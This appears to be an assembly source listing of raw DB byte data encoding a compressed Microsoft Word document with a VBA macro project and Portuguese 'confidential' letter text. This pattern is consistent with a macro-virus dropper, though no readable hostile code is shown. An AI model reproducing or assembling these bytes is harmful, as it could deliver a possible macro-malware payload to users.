DB 000H,00DH,000H,044H,049H,003H,014H,0D7H,0DBH,0D2H,0DAH,0F4H,0F6H,010H,000H
DB 00FH,000H,045H,04EH,0D7H,0D9H,045H,0D3H,0D8H,0EAH,0F3H,010H,060H,000H,000H
DB 00AH,000H,057H,044H,002H,02AH,003H,018H,044H,0FCH,0D3H,010H,000H,001H,000H
DB 049H,060H,060H,040H,010H,010H,000H,00EH,000H,0D3H,0DEH,0D4H,0DDH,050H,04CH
DB 041H,054H,045H,071H,0ACH,002H,0AAH,000H,0E1H,012H,0D6H,0E2H,043H,054H,04FH
DB 068H,002H,0CBH,002H,00FH,0D4H,0E7H,04EH,0D3H,0E6H,00AH,027H,012H,016H,000H
DB 043H,04FH,0C9H,004H,0D2H,0EAH,030H,076H,003H,057H,043H,04FH,0D2H,0E5H,0D4H
DB 0E4H,0E1H,01CH,003H,01BH,04CH,049H,04EH,045H,053H,000H,040H,0BAH,0CEH,010H
DB 000H,006H,000H,049H,04DH,050H,04FH,052H,054H,069H,0C5H,002H,0C1H,000H,0D9H
DB 06CH,0D3H,0BEH,092H,0D0H,003H,0D9H,017H,015H,06AH,002H,086H,042H,077H,001H
DB 001H,022H,04FH,0F2H,033H,004H,04FH,004H,023H,05BH,0FFH,07BH,041H,0A2H,0B1H
DB 002H,018H,002H,042H,093H,004H,00FH,00EH,005H,055H,050H,00CH,002H,01FH,0FFH
DB 0FFH,00EH,002H,003H,002H,02AH,011H,06DH,0DBH,002H,02AH,00CH,002H,008H,003H
DB 029H,00CH,002H,0DEH,0D3H,0D8H,012H,023H,08FH,00FH,004H,000H,0EFH,039H,007H
DB 021H,03EH,052H,012H,0EFH,039H,00AH,00CH,001H,002H,01DH,021H,002H,004H,001H
DB 078H,0B2H,080H,001H,000H,0E2H,039H,012H,03FH,030H,02AH,002H,002H,000H,000H
DB 090H,009H,000H,070H,014H,006H,048H,003H,000H,082H,002H,000H,064H,0E4H,004H
DB 004H,009H,040H,002H,0F4H,01CH,080H,025H,01EH,005H,000H,024H,018H,000H,000H
DB 040H,002H,014H,001H,002H,0DFH,03DH,000H,080H,0ADH,002H,016H,007H,002H,06AH
DB 001H,014H,008H,006H,012H,009H,002H,012H,080H,055H,0F8H,000H,008H,00CH,002H
DB 04AH,00AH,03CH,002H,00AH,016H,002H,09EH,073H,022H,045H,008H,06CH,065H,03EH
DB 058H,008H,002H,019H,073H,0A2H,0A0H,0A2H,051H,06FH,0D2H,06DH,065H,000H,028H
DB 00DH,082H,0B6H,025H,05CH,000H,003H,000H,080H,02AH,05CH,000H,047H,07BH,030H
DB 030H,030H,032H,030H,034H,0D8H,033H,030H,02DH,022H,01EH,000H,000H,004H,043H
DB 000H,00AH,002H,00EH,001H,001H,012H,030H,030H,034H,036H,07DH,023H,032H,000H
DB 000H,000H,02EH,030H,023H,030H,023H,043H,03AH,05CH,000H,057H,049H,04EH,044H
DB 04FH,057H,040H,001H,053H,05CH,000H,053H,059H,053H,0F2H,0B3H,05CH,092H,0E4H
DB 044H,04FH,04CH,045H,032H,02EH,054H,080H,000H,008H,04CH,042H,023H,000H,008H
DB 020H,022H,059H,080H,06FH,06DH,061H,074H,069H,06FH,06EH,000H,004H,000H,05EH
DB 011H,000H,002H,016H,000H,007H,080H,002H,022H,0BBH,021H,080H,06DH,073H,03EH
DB 080H,004H,000H,00EH,001H,006H,000H,053H,004H,072H,02CH,045H,072H,062H,02FH
DB 073H,0D0H,000H,02FH,000H,000H,000H,07AH,080H,009H,070H,080H,001H,001H,046H
DB 000H,041H,046H,035H,031H,034H,031H,036H,001H,000H,092H,0CAH,042H,038H,035H
DB 033H,02DH,031H,031H,002H,044H,080H,004H,043H,039H,044H,02DH,000H,000H,034H
DB 034H,0C0H,034H,035H,035H,033H,035H,034H,001H,048H,017H,046H,001H,004H,033H
DB 040H,000H,02EH,054H,057H,044H,023H,04DH,082H,08CH,072H,06FH,073H,06FH,066H
DB 074H,020H,005H,002H,000H,000H,03DH,020H,000H,060H,020H,04FH,062H,06AH,065H
DB 000H,063H,074H,020H,04CH,069H,062H,020H,000H,072H,061H,01CH,072H,079H,072H
DB 082H,001H,01EH,050H,030H,000H,090H,00DH,000H,013H,072H,001H,000H,002H,062H
DB 050H,044H,035H,032H,038H,000H,039H,037H,045H,032H,02DH,044H,042H,031H,032H
DB 000H,000H,031H,005H,050H,041H,034H,01DH,050H,080H,04AH,050H,05CH,090H,056H
DB 042H,045H,05CH,080H,002H,085H,028H,045H,058H,0A7H,028H,000H,087H,093H,000H
DB 087H,094H,083H,041H,093H,043H,078H,04FH,081H,000H,033H,048H,044H,078H,082H
DB 04FH,040H,075H,0B4H,0CCH,042H,078H,00AH,098H,0C0H,02BH,08EH,0C4H,000H,020H
DB 02CH,032H,044H,046H,038H,000H,044H,030H,034H,043H,02DH,035H,042H,002H,0C3H
DB 02DH,031H,000H,000H,030H,031H,042H,02DH,042H,048H,044H,045H,035H,040H,078H
DB 041H,041H,040H,077H,034H,000H,004H,005H,0C0H,002H,032H,008H,055H,041H,052H
DB 051H,055H,0F2H,08DH,04FH,053H,020H,044H,045H,002H,081H,020H,0D2H,068H,04FH
DB 047H,052H,041H,04DH,041H,082H,05DH,04DH,049H,043H,052H,04FH,053H,082H,04EH
DB 000H,000H,054H,020H,04FH,046H,046H,049H,043H,004H,045H,05CH,084H,001H,04DH
DB 053H,04FH,039H,000H,000H,037H,030H,02EH,044H,04CH,04CH,048H,05CH,083H,025H
DB 020H,038H,014H,02EH,030H,092H,000H,080H,05CH,00FH,042H,0BDH,001H,000H,013H
DB 011H,0C2H,001H,094H,01EH,019H,042H,0A8H,042H,000H,002H,000H,000H,047H,001H
DB 044H,074H,01AH,04EH,004H,032H,000H,018H,040H,033H,054H,044H,000H,068H,084H
DB 002H,040H,038H,072H,092H,080H,08FH,063H,044H,0B2H,05EH,090H,072H,091H,040H
DB 0B6H,01CH,051H,0C0H,006H,000H,000H,000H,000H,048H,042H,001H,031H,0C2H,0C4H
DB 0DFH,02DH,0C0H,0D9H,01EH,042H,002H,001H,000H,000H,005H,02CH,042H,01AH,096H
DB 01EH,02AH,022H,042H,008H,02BH,042H,001H,010H,042H,001H,0F7H,007H,023H,0B0H
DB 002H,054H,007H,053H,074H,07FH,0DDH,012H,0AEH,002H,04CH,023H,03FH,022H,0A9H
DB 02FH,0C1H,026H,0C1H,049H,044H,03DH,022H,07BH,000H,005H,032H,031H,039H,045H
DB 034H,030H,034H,042H,012H,064H,033H,013H,0C5H,044H,032H,02DH,042H,043H,01CH
DB 014H,041H,034H,012H,0C5H,015H,0C4H,022H,068H,030H,07DH,022H,00DH,00AH,037H
DB 0A8H,03DH,00BH,076H,02FH,026H,048H,003H,00CH,003H,020H,003H,004H,00DH,00AH
DB 04EH,061H,06DH,065H,03DH,022H,025H,0F0H,002H,031H,048H,065H,06CH,070H,0B0H
DB 000H,043H,06FH,06EH,074H,052H,091H,003H,069H,030H,002H,013H,043H,04DH,047H
DB 03DH,022H,046H,033H,046H,000H,006H,031H,037H,034H,038H,042H,036H,033H,038H
DB 046H,00BH,004H,002H,020H,044H,050H,042H,03DH,022H,000H,000H,045H,036H,045H
DB 034H,036H,031H,039H,038H,041H,037H,037H,038H,039H,042H,037H,039H,003H,080H
DB 005H,004H,002H,01EH,047H,043H,03DH,022H,044H,039H,044H,042H,035H,045H,036H
DB 033H,035H,002H,03BH,010H,000H,035H,046H,039H,043H,002H,017H,00DH,00AH,05BH
DB 048H,06FH,073H,074H,020H,045H,078H,074H,000H,020H,065H,06EH,064H,065H,072H
DB 020H,049H,06EH,066H,06FH,05DH,00DH,00AH,008H,09BH,031H,03DH,000H,040H,07BH
DB 033H,038H,033H,032H,044H,036H,034H,030H,02DH,043H,046H,039H,030H,022H,0AAH
DB 043H,000H,000H,046H,02DH,038H,045H,034H,033H,02DH,030H,030H,041H,030H,043H
DB 039H,031H,031H,030H,0A0H,018H,030H,035H,041H,07DH,03BH,022H,056H,03BH,008H
DB 036H,030H,00DH,00AH,002H,05AH,062H,00EH,06BH,073H,070H,018H,008H,061H,063H
DB 065H,002H,051H,00BH,0F9H,03DH,035H,034H,02CH,020H,035H,002H,004H,036H,035H
DB 030H,02CH,000H,0C2H,020H,034H,030H,031H,02CH,020H,05AH,00DH,00AH,013H,095H
DB 0A1H,0B1H,01AH,0E1H,012H,073H,00CH,003H,007H,023H,04FH,045H,003H,01DH,012H
DB 084H,001H,000H,0FEH,0FFH,003H,0F2H,07DH,043H,09EH,006H,009H,002H,003H,016H
DB 000H,0C0H,031H,080H,004H,006H,000H,046H,01DH,002H,008H,017H,073H,06FH,020H
DB 064H,06FH,020H,04DH,069H,063H,072H,035H,03FH,0F1H,02CH,002H,094H,064H,020H
DB 000H,002H,038H,062H,062H,003H,00CH,002H,027H,000H,010H,002H,02FH,003H,00CH
DB 02EH,002H,00DH,075H,06DH,000H,0FCH,065H,06EH,074H,02EH,038H,000H,0F4H,039H
DB 0B2H,071H,002H,017H,008H,003H,00FH,09EH,056H,018H,003H,07EH,00FH,004H,087H
DB 0BCH,00FH,010H,00FH,010H,005H,010H,000H,000H,0DDH,01BH,005H,05EH,022H,013H
DB 00DH,008H,007H,018H,005H,016H,009H,028H,031H,006H,030H,0FFH,0FDH,007H,020H
DB 00FH,008H,007H,010H,007H,050H,00FH,010H,007H,010H,007H,008H,007H,060H,007H
DB 008H,036H,006H,088H,007H,008H,007H,048H,00FH,008H,007H,010H,007H,048H,0FFH
DB 083H,00FH,008H,007H,010H,007H,058H,007H,010H,007H,038H,007H,008H,007H,020H
DB 00FH,008H,00FH,010H,007H,010H,052H,019H,000H,000H,0DBH,002H,00DH,02BH,0C0H
DB 007H,050H,007H,008H,025H,012H,018H,00CH,002H,018H,060H,0EAH,081H,032H,059H
DB 06FH,0BEH,001H,007H,0C0H,007H,008H,0FFH,00FH,007H,028H,007H,008H,002H,02BH
DB 00FH,003H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,002H,010H,009H,02DH,020H,013H,000H,018H,020H,050H,041H,047H,045H,020H
DB 015H,020H,02DH,00DH,028H,00FH,002H,004H,010H,041H,020H,071H,020H,080H,075H
DB 065H,06DH,020H,069H,042H,008H,072H,065H,073H,073H,061H,072H,020H,070H,06FH
DB 002H,007H,000H,032H,03AH,00DH,041H,073H,073H,075H,06EH,074H,06FH,002H,009H
DB 054H,02EH,002H,005H,032H,0BCH,063H,069H,08CH,000H,06FH,073H,042H,043H,002H
DB 02AH,02CH,00DH,041H,007H,010H,073H,020H,073H,061H,075H,064H,061H,0E7H,048H
DB 000H,0F5H,065H,073H,005H,016H,0E7H,0E3H,002H,034H,013H,020H,041H,055H,054H
DB 048H,04FH,052H,020H,000H,021H,015H,009H,050H,0E1H,067H,069H,06EH,061H,008H
DB 089H,009H,013H,020H,044H,082H,0B9H,020H,015H,000H,004H,00DH,043H,06FH,06DH
DB 020H,061H,06DH,06FH,072H,02CH,004H,00AH,063H,061H,072H,069H,06EH,004H,040H
DB 068H,06FH,002H,00DH,04FH,04EH,046H,049H,044H,045H,04EH,043H,049H,041H,04CH
DB 002H,01AH,06EH,000H,006H,066H,069H,064H,065H,06EH,063H,069H,061H,06CH,00FH
DB 04AH,00BH,04AH,072H,064H,069H,061H,069H,0A9H,018H,00CH,08BH,043H,06FH,003H
DB 014H,06CH,033H,06BH,065H,002H,055H,072H,069H,061H,032H,0A4H,002H,0E9H,013H
DB 020H,043H,01CH,0C3H,052H,045H,002H,081H,007H,085H,005H,019H,070H,06FH,072H
DB 002H,0A2H,007H,0B4H,00DH,045H,06DH,020H,012H,00DH,012H,009H,040H,000H,074H
DB 061H,020H,061H,03AH,00DH,092H,049H,052H,045H,047H,041H,020H,045H,053H,050H
DB 045H,021H,020H,004H,097H,04DH,045H,04EH,053H,012H,057H,04DH,020H,043H,045H
DB 052H,054H,049H,062H,066H,041H,044H,00CH,0C1H,041H,00DH,008H,015H,002H,02CH
DB 049H,053H,054H,052H,004H,014H,075H,069H,074H,06FH,020H,0A2H,03EH,002H,0C2H
DB 001H,094H,019H,03DH,013H,020H,046H,049H,04CH,045H,04EH,041H,04DH,012H,099H
DB 00DH,00AH,00DH,05CH,070H,012H,017H,020H,000H,04FH,062H,072H,069H,067H,002H
DB 0ADH,028H,061H,029H,02CH,020H,00DH,050H,045H,053H,053H,042H,094H,04FH,012H
DB 009H,050H,072H,065H,07AH,005H,015H,020H,053H,065H,012H,028H,072H,002H,01FH
DB 03AH,00DH,006H,016H,032H,0A2H,073H,006H,014H,065H,073H,002H,013H,01DH,06FH
DB 020H,064H,065H,002H,0D9H,04EH,055H,04DH,023H,007H,053H,002H,05FH,000H,004H
DB 051H,075H,065H,072H,069H,064H,06FH,073H,020H,070H,012H,031H,02CH,00DH,052H
DB 045H,03AH,080H,0C1H,00DH,052H,065H,066H,065H,072H,0EAH,002H,0A2H,002H,0EBH
DB 052H,065H,073H,070H,065H,002H,0B4H,018H,0E9H,050H,020H,053H,0E3H,06FH,020H
DB 002H,02EH,06DH,002H,02EH,020H,073H,069H,06EH,063H,065H,042H,0E5H,020H,076H
DB 068H,081H,06FH,074H,06FH,012H,0EFH,055H,012H,0C1H,082H,01BH,0E7H,012H,0B6H
DB 056H,049H,041H,020H,041H,0C9H,012H,05AH,002H,020H,00DH,003H,00AH,043H,04FH
DB 052H,052H,045H,049H,04FH,020H,032H,034H,020H,022H,005H,041H,053H,001H,001H
DB 004H,015H,046H,041H,043H,02DH,053H,0CDH,04DH,002H,0FAH,00DH,0DAH,06CH,074H
DB 069H,06DH,061H,0C0H,000H,020H,067H,072H,061H,076H,061H,022H,030H,002H,0A2H
DB 04CH,041H,053H,054H,053H,041H,056H,045H,018H,00DH,044H,042H,059H,002H,0A5H
DB 006H,020H,069H,06DH,070H,012H,087H,073H,002H,082H,022H,0C7H,052H,049H,04EH
DB 054H,0FDH,0FFH,016H,0B5H,00DH,022H,0DCH,00FH,003H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0BFH,0AAH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,003H,010H,039H,072H,06EH,048H
DB 002H,004H,059H,002H,004H,06EH,002H,004H,082H,002H,004H,0AAH,02AH,098H,002H
DB 004H,0A5H,002H,004H,0B5H,002H,004H,0C3H,002H,004H,0CBH,002H,004H,0E1H,002H
DB 004H,0F4H,002H,004H,014H,014H,0A8H,0AAH,000H,000H,023H,002H,004H,027H,002H
DB 004H,033H,002H,004H,044H,002H,004H,060H,002H,004H,06BH,002H,004H,075H,002H
DB 004H,0AAH,07AH,08AH,002H,004H,099H,002H,004H,0B9H,002H,004H,0D8H,002H,004H
DB 0D9H,002H,004H,0FDH,003H,069H,007H,004H,00FH,00DH,007H,018H,000H,016H,0DFH
DB 000H,00FH,01AH,009H,01AH,0FBH,009H,00BH,000H,000H,0F9H,00BH,00DH,00FH,034H
DB 009H,01CH,00FH,01AH,009H,01AH,0F7H,009H,00BH,00FH,075H,0FFH,0F2H,00FH,01AH
DB 008H,010H,00FH,04EH,008H,019H,00FH,0B6H,009H,019H,00FH,01AH,00AH,01AH,0F5H
DB 00AH,00CH,000H,0F3H,00BH,00DH,00CH,068H,00BH,019H,00FH,00CH,017H,080H,00FH
DB 010H,00FH,010H,00EH,010H,001H,012H,087H,001H,015H,000H,000H,001H,011H,000H
DB 000H,001H,017H,002H,004H,066H,0D5H,016H,002H,004H,002H,024H,018H,013H,002H
DB 019H,013H,0B0H,0A9H,002H,008H,0AAH,002H,004H,0B7H,002H,004H,0B8H,002H,004H
DB 013H,0C0H,0AAH,0C1H,0CAH,002H,008H,0CBH,002H,004H,0D6H,002H,004H,0D7H,002H
DB 004H,013H,0CCH,000H,0FBH,0F2H,0FBH,0F2H,005H,005H,002H,03FH,0FFH,0FFH,00FH
DB 003H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0FFH,047H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,005H,010H,010H,003H,06AH,003H,009H
DB 055H,000H,008H,008H,001H,068H,008H,000H,06EH,048H,016H,004H,000H,007H,007H
DB 009H,00BH,01CH,000H,01FH,000H,010H,0B0H,0D0H,02FH,020H,0B0H,0E0H,03DH,021H
DB 0B0H,0A5H,006H,022H,002H,004H,023H,090H,089H,084H,0AFH,005H,024H,002H,004H
DB 025H,0B0H,000H,000H,0CFH,06FH,003H,047H,003H,004H,0DFH,00DH,003H,014H,001H
DB 002H,005H,021H,002H,004H,0DBH,0FCH,004H,003H,0C2H,0CCH,023H,002H,009H,003H
DB 014H,0FEH,0C2H,069H,002H,00BH,000H,020H,002H,005H,002H,00BH,00FH,003H,00FH
DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,01FH,000H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00EH,010H,001H,000H,043H,000H,06FH,000H,06DH,000H,070H
DB 000H,04FH,0F8H,0F0H,000H,062H,000H,024H,028H,012H,0A8H,00FH,003H,00FH,010H
DB 009H,010H,012H,000H,002H,000H,00BH,053H,009H,01AH,00FH,00AH,009H,010H,0FAH
DB 0FFH,05DH,002H,00BH,06FH,002H,004H,00FH,003H,00FH,010H,00FH,010H,00FH,010H
DB 007H,010H,00FH,080H,007H,018H,00FH,008H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0FFH,0FFH,00FH,010H,007H,010H,00FH,080H,007H,018H,00FH,008H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,007H,010H,00FH,080H,007H,018H,00FH
DB 008H,00FH,010H,003H,010H,000H,018H,012H,000H,01AH,000H,00AH,000H,001H,000H
DB 05BH,000H,00FH,012H,0CAH,003H,012H,000H,000H,030H,040H,028H,000H,000H,060H
DB 0F1H,0FFH,002H,003H,008H,000H,006H,000H,04EH,022H,020H,072H,022H,022H,061H
DB 000H,00AH,080H,06CH,002H,01FH,002H,002H,004H,010H,000H,043H,04AH,0CCH,00CH
DB 04FH,04AH,0FEH,07FH,050H,002H,004H,00EH,020H,051H,002H,004H,002H,015H,00EH
DB 003H,036H,000H,041H,060H,0F2H,0FFH,0A1H,000H,036H,002H,018H,013H,000H,002H
DB 002H,046H,002H,044H,06EH,000H,074H,000H,065H,000H,020H,022H,06AH,061H,000H
DB 072H,000H,0E1H,000H,0A8H,003H,067H,000H,02EH,006H,00EH,064H,002H,010H,0E3H
DB 002H,022H,002H,02BH,008H,003H,030H,000H,0FEH,06FH,0F1H,0FFH,082H,00AH,0F2H
DB 004H,084H,00CH,000H,041H,000H,075H,002H,03EH,06FH,024H,0ACH,072H,002H,02EH
DB 065H,000H,0E7H,000H,045H,011H,005H,032H,002H,002H,0B8H,004H,000H,06DH,042H
DB 0D5H,02CH,004H,032H,002H,001H,02CH,002H,044H,00AH,000H,02DH,001H,015H,002H
DB 05CH,050H,000H,0C1H,000H,047H,000H,049H,002H,0C2H,041H,002H,00EH,02DH,002H
DB 018H,002H,000H,010H,08AH,008H,000H,005H,02EH,032H,004H,02EH,012H,001H,032H
DB 002H,016H,00DH,000H,050H,004H,090H,069H,000H,06EH,000H,0AAH,058H,061H,002H
DB 02AH,058H,002H,004H,064H,004H,0ACH,059H,002H,01EH,002H,000H,011H,006H,034H
DB 005H,062H,022H,006H,062H,043H,0B5H,02AH,002H,088H,069H,002H,030H,064H,002H
DB 0BAH,003H,0D6H,06FH,002H,010H,000H,012H,044H,012H,006H,02EH,02AH,004H,062H
DB 032H,001H,04AH,02BH,02AH,002H,044H,009H,002H,0BAH,072H,000H,009H,02EH,065H
DB 012H,050H,003H,02CH,013H,006H,02CH,038H,004H,02CH,042H,001H,0A2H,02AH,038H
DB 002H,02CH,010H,000H,0DAH,012H,06AH,074H,002H,02EH,06DH,002H,05EH,020H,004H
DB 008H,070H,002H,05CH,065H,000H,056H,02AH,073H,002H,002H,007H,0F6H,014H,006H
DB 03AH,036H,004H,03AH,052H,001H,013H,068H,00FH,00EH,03AH,067H,002H,036H,061H
DB 000H,0D6H,0AEH,076H,002H,046H,019H,02EH,015H,00CH,038H,062H,006H,038H,013H
DB 0E4H,06DH,004H,0F2H,005H,0CEH,013H,0A2H,071H,012H,074H,069H,002H,03EH,051H
DB 0F4H,033H,0AAH,002H,000H,016H,006H,038H,04AH,004H,070H,072H,001H,04AH,002H
DB 0AAH,019H,012H,05AH,043H,03CH,013H,0D6H,00FH,038H,056H,0ACH,076H,014H,016H
DB 003H,01AH,063H,002H,080H,06DH,002H,0C6H,06EH,000H,068H,002H,014H,003H,0F6H
DB 017H,00CH,04CH,082H,006H,04CH,0D5H,0A2H,017H,0E4H,072H,012H,07EH,020H,012H
DB 08AH,0BAH,002H,008H,015H,086H,070H,01CH,09EH,020H,000H,064H,002H,052H,074H
DB 002H,004H,015H,0D5H,003H,04CH,018H,006H,04CH,058H,004H,098H,092H,001H,058H
DB 002H,098H,020H,012H,06EH,06FH,002H,042H,066H,002H,076H,003H,042H,058H,06EH
DB 06EH,000H,063H,002H,00AH,023H,0C0H,020H,002H,054H,06EH,000H,00FH,05AH,017H
DB 0F8H,00DH,05AH,019H,006H,05AH,002H,051H,000H,064H,0A7H,0D9H,002H,003H,06CH
DB 000H,01CH,093H,035H,035H,06EH,032H,002H,01EH,02FH,066H,026H,066H,0F2H,006H
DB 002H,01CH,02DH,022H,082H,002H,0A8H,03EH,032H,058H,00AH,070H,0FFH,0FFH,003H
DB 000H,03AH,000H,028H,00AH,00CH,029H,006H,00CH,004H,002H,018H,0EEH,068H,02DH
DB 008H,01AH,005H,00EH,00DH,01CH,07CH,006H,02AH,003H,042H,007H,00CH,004H,000H
DB 03CH,002H,05CH,02DH,006H,01AH,003H,00EH,03DH,02CH,0E5H,000H,03DH,00CH,00EH
DB 007H,078H,004H,002H,018H,03DH,000H,007H,00EH,018H,032H,046H,020H,000H,013H
DB 0D6H,023H,07EH,023H,058H,07DH,0B1H,035H,092H,072H,012H,0F8H,023H,05AH,013H
DB 0F4H,025H,0C8H,005H,00EH,03AH,002H,0F9H,001H,000H,008H,002H,036H,003H,010H
DB 075H,012H,050H,016H,0ABH,074H,012H,0C0H,003H,016H,005H,002H,0E0H,041H,000H
DB 054H,032H,0C0H,003H,00EH,004H,032H,082H,041H,032H,09EH,065H,002H,022H,0F5H
DB 078H,013H,068H,06FH,022H,0A6H,061H,022H,0E0H,003H,010H,033H,0F2H,033H,090H
DB 002H,000H,015H,002H,048H,003H,00EH,015H,08CH,005H,024H,073H,014H,0BFH,000H
DB 020H,004H,02CH,075H,014H,0D2H,0E7H,000H,0F5H,004H,08AH,005H,030H,003H,078H
DB 005H,030H,025H,0BCH,005H,06AH,019H,002H,046H,0B1H,0BFH,045H,00AH,072H,000H
DB 02CH,002H,03EH,01FH,0CCH,067H,012H,0E8H,033H,0C4H,003H,01CH,028H,026H,012H
DB 090H,033H,080H,023H,0AAH,020H,022H,036H,0AEH,05FH,06DH,002H,0C6H,003H,03EH
DB 013H,0D2H,00CH,024H,02AH,06DH,002H,04AH,023H,0A6H,033H,0A2H,025H,0A6H,005H
DB 084H,003H,01EH,04FH,022H,0E4H,046H,051H,034H,042H,044H,044H,000H,045H,002H
DB 00AH,043H,002H,00AH,041H,000H,04CH,012H,01AH,000H,002H,034H,073H,03AH,06EH
DB 000H,07DH,0EDH,02FH,066H,06CH,00FH,09AH,042H,0F2H,043H,0EEH,025H,066H,00FH
DB 09AH,013H,004H,082H,072H,012H,002H,043H,01EH,069H,012H,010H,01FH,014H,033H
DB 0F8H,0D5H,05AH,005H,090H,00DH,00CH,02CH,06CH,01FH,064H,000H,003H,0E6H,003H
DB 0C4H,061H,002H,04EH,06FH,002H,0A0H,013H,0E8H,000H,002H,0FEH,00AH,0DBH,05BH
DB 002H,038H,00BH,018H,070H,014H,002H,003H,01AH,00EH,002H,0D6H,003H,0FEH,025H
DB 004H,003H,018H,073H,012H,0CAH,053H,004H,061H,022H,09CH,000H,08CH,0AAH,000H
DB 003H,052H,030H,003H,0F8H,054H,000H,052H,002H,02AH,047H,012H,07EH,020H,002H
DB 008H,053H,052H,030H,045H,002H,054H,046H,054H,049H,002H,010H,015H,00CH,014H
DB 000H,04DH,002H,018H,04EH,000H,053H,002H,012H,047H,002H,00AH,04DH,002H,07EH
DB 043H,055H,0ECH,002H,008H,052H,022H,026H,049H,052H,0FEH,049H,002H,02EH,041H
DB 000H,044H,002H,01EH,013H,03BH,013H,00FH,02EH,002H,02EH,005H,060H,0AEH,0BFH
DB 049H,002H,042H,003H,06CH,009H,02CH,015H,002H,02CH,075H,012H,0D6H,023H,07CH
DB 013H,0BEH,025H,014H,02FH,068H,003H,016H,015H,024H,00FH,012H,0A6H,07FH,0CBH
DB 013H,0EAH,043H,07AH,04FH,094H,043H,094H,003H,0F6H,04FH,0B8H,003H,058H,072H
DB 034H,01AH,045H,0F0H,020H,022H,088H,020H,000H,023H,012H,04AH,0B8H,06DH,0ADH
DB 012H,048H,00DH,094H,024H,013H,04AH,067H,022H,048H,003H,05EH,028H,002H,008H
DB 029H,014H,0F0H,023H,04EH,007H,014H,018H,053H,002H,0C4H,0B6H,05DH,04FH,002H
DB 0EAH,015H,01AH,015H,002H,014H,013H,05EH,07AH,002H,02AH,009H,032H,020H,002H
DB 024H,033H,020H,053H,012H,072H,042H,002H,061H,0C4H,0EEH,000H,029H,014H,070H
DB 001H,000H,012H,00EH,030H,033H,024H,053H,002H,090H,025H,098H,003H,04AH,073H
DB 006H,02AH,06FH,0B6H,06CH,0B6H,0C1H,0BBH,002H,0AEH,00EH,000H,051H,000H,075H
DB 002H,03AH,003H,0B0H,003H,07AH,003H,04AH,070H,002H,086H,023H,064H,013H,02CH
DB 001H,012H,0DEH,0A3H,05AH,013H,076H,033H,05AH,003H,000H,00BH,012H,0E2H,065H
DB 022H,0CCH,065H,062H,034H,0EAH,036H,0CAH,029H,004H,052H,002H,048H,073H,0F5H
DB 0D8H,022H,0C8H,065H,016H,08AH,073H,002H,048H,063H,030H,045H,042H,003H,04EH
DB 002H,000H,01BH,002H,0D4H,063H,09EH,020H,022H,05EH,003H,06CH,0AFH,01BH,063H
DB 0BEH,003H,06CH,023H,0D0H,023H,0FCH,063H,002H,044H,072H,006H,01CH,013H,08AH
DB 013H,0D2H,073H,012H,03CH,013H,03AH,00AH,000H,055H,0ABH,0A8H,022H,0CEH,013H
DB 088H,062H,002H,080H,061H,072H,0DEH,06FH,006H,01AH,009H,000H,056H,034H,074H
DB 020H,012H,052H,0C9H,002H,0A4H,056H,005H,045H,002H,008H,023H,044H,014H,008H
DB 018H,043H,012H,096H,052H,004H,01AH,049H,002H,00AH,020H,000H,032H,000H,034H
DB 055H,02AH,022H,050H,048H,002H,00CH,052H,002H,02CH,053H,003H,02DH,000H,00EH
DB 008H,02EH,046H,002H,014H,043H,052H,040H,053H,000H,0EAH,076H,0CDH,022H,05AH
DB 049H,032H,0CCH,045H,004H,022H,07FH,03CH,07FH,03CH,000H,012H,052H,07FH,09AH
DB 069H,002H,0B4H,07EH,09AH,002H,026H,0FFH,054H,0FDH,0FFH,007H,052H,08EH,01BH
DB 002H,0B6H,06EH,032H,0CEH,074H,002H,0D0H,075H,002H,0D0H,045H,0DCH,063H,062H
DB 023H,09AH,013H,0FCH,063H,09AH,085H,0CEH,013H,0D0H,0E7H,01AH,04CH,06FH,000H
DB 008H,008H,012H,047H,061H,012H,0B9H,043H,0BFH,045H,0FBH,004H,00CH,032H,04AH
DB 053H,038H,065H,0E0H,013H,09CH,072H,00CH,02EH,00BH,00AH,002H,0F9H,01FH,0B7H
DB 061H,000H,003H,010H,000H,04CH,012H,0AAH,023H,034H,033H,0CCH,037H,0DBH,003H
DB 06AH,013H,05CH,033H,026H,06EH,002H,08CH,013H,0A6H,002H,007H,012H,009H,05BH
DB 0D9H,001H,092H,0D6H,002H,05CH,062H,012H,0A6H,003H,092H,0AAH,0D0H,06CH,074H
DB 0AEH,02FH,002H,0BEH,06FH,042H,04EH,061H,012H,0FCH,0E9H,000H,00AH,000H,002H
DB 001H,00EH,002H,004H,0D2H,0DEH,051H,0CDH,022H,0A9H,000H,000H,014H,002H,00CH
DB 016H,002H,004H,018H,002H,004H,01AH,002H,004H,072H,020H,000H,01EH,002H,008H
DB 0D3H,0EBH,0AAH,0AAH,022H,002H,008H,024H,002H,004H,03DH,002H,004H,046H,002H
DB 004H,04BH,002H,004H,05BH,002H,004H,071H,002H,004H,07AH,002H,004H,0AAH,00AH
DB 09EH,002H,004H,0A8H,002H,004H,0B5H,002H,004H,0C2H,002H,004H,0E8H,002H,004H
